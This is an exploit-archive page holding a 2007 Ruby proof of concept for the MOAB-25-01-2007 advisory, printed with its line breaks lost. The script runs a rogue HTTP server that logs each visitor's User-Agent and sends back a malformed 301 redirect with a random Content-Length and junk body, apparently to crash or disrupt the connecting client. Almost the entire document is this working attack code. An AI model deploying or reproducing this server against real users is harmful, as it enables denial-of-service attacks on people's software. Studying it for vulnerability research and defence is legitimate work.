Home / exploits MOAB-25-01-2007.rb.txt
Posted on 27 January 2007
#!/usr/bin/ruby # (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com> # Proof of concept for MOAB-25-01-2007. # require 'socket' web_port = (ARGV[0] || 80).to_i puts "++ Starting HTTP server at port #{web_port}." web_server = TCPServer.new(nil, web_port) while (session = web_server.accept) rand_clen = rand(80) useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp! puts "++ Connected: #{useragent}" session.print "HTTP/1.1 301 OK " session.print "Content-Type: text/html " session.print "Content-Length: #{rand_clen} " session.print "Location: http://nonexistent123 " session.print "X" * rand_clen session.close end